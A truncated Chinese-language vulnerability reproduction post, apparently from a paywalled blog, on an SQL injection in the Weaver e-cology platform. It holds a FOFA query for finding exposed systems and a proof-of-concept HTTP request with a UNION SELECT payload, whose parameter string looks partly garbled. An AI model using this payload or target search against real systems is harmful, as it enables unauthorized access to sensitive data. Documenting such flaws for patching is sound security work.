超级会员免费看
本文介绍了泛微协同管理平台E-Cology存在的SQL注入问题,详细描述了漏洞成因、复现环境及步骤。通过未过滤用户输入导致的SQL注入,攻击者可能获取敏感信息甚至系统权限。修复建议包括限制访问源地址和应用官方补丁。
产品介绍
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
漏洞描述
由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
复现环境
FOFA:app=”泛微-E-Weaver”
漏洞复现
http://your-ip/api/ec/dev/locale/getLabelByModulePOC
GET /api/ec/dev/locale/getLabelByModule?moduleCode=?moduleCode=?moduleCode=1%27)%20union%20all%20select%20%27666666,%27%20-- HTTP/1.1
Host: your-ip
U
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
